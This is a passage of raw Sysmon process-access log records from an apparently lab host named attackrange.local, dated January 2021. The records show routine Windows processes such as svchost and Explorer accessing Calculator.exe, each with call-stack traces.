Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360738Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.483{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360737Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.483{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360736Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.483{8e433fbf-337b-6013-8402-000000001100}16561804C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360735Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.483{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360734Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360733Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360732Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360731Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360730Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360729Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360728Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360727Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-337b-6013-8402-000000001100}165610244C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360726Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-337b-6013-8402-000000001100}16562912C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360725Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360724Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360723Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360722Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360721Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-337e-6013-9402-000000001100}75849880C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360720Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360719Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360718Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360717Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.452{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\S